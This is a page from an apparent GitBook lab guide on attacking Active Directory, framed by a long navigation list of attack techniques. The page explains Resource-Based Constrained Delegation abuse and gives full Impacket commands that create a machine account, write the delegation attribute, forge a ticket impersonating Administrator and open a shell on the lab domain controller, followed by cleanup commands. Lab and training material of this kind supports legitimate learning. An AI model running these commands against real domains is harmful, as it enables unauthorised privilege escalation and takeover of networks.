Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  1. Delegations

Resource Based Constrained Delegation

  • Resource Based Constrained delegation (RBCD)

  • You can abuse RBCD when you can edit the attribute : msDS-AllowedToActOnBehalfOfOtherIdentity

Resource-Based Constrained Delegation

As an added functionality post-Windows Server 2012, Microsoft introduced a fine-tuned delegation method called “Resource-Based Constrained Delegation.” Resource-Based Constrained Delegation allows for delegation settings to be configured on the target service/resource instead of on the user account (interactive account). Resource-Based Constrained Delegation is implemented by “msDS-AllowedToActOnBehalfOfOtherIdentity” on a target computer object.

This field is available on Windows 8.1+ and Windows Server 2012+, and domain admin rights are not required to modify this field.

Exploitation Methodology

The exploitation of RBCD is quite easy if you paid attention to the theory above. The following steps are observed:

  • Create a fake computer account

  • Trigger legit machine account NYC$ via RBCD to authenticate

  • Fake computer account acts on behalf of Domain Controller (NYC$) account

  • Generate fake machine account’s hash

  • Obtain Service Ticket

  • An example of exploitation is when you got genericAll or genericWrite ACL on a Computer.

  • You can find this in the lab when you look at the acl on users.

  • We can see that diego.Montenegro got a generic Write on NYC

  • The RBCD exploitation append with the following commands :

  • Create a computer X (rbcd$)

We are using diego's password which we changed here:

addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/diego.montenegro:letsdothis'

  • Add delegation write on our target from X (rbcd$)

rbcd.py -delegate-from 'rbcd$' -delegate-to 'NYC$' -dc-ip 'nyc.newyork.local' -action 'write' newyork.local/diego.montenegro:letsdothis

  • Now X (rbcd$) got delegation permission on our target, you can now do an s4u2self query followed by an S4u2proxy.

  • This will result in an administrator permission on NYC.

getST.py -spn 'cifs/nyc.newyork.local' -impersonate Administrator -dc-ip 'nyc.newyork.local' 'newyork.local/rbcd$:rbcdpass'

export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass @nyc.newyork.local

  • After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:

rbcd.py -delegate-from 'rbcd$' -delegate-to 'nyc$' -dc-ip 'nyc.newyork.local' -action 'flush' newyork.local/diego.Montenegro:letsdothis
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/mateo.Pacheco:elsenorpacheco' -delete
PreviousWithout protocol transitionNextUnconstrained delegation Enum

Last updated 2 years ago

https://app.gitbook.com/o/FcWoXlVoyvVjSyaVPVSU/s/B2Dm6vWGbM7kQRITOyVl/user-acl-exploits/generic-all-on-user-centralpark-greater-than-diego.montenegro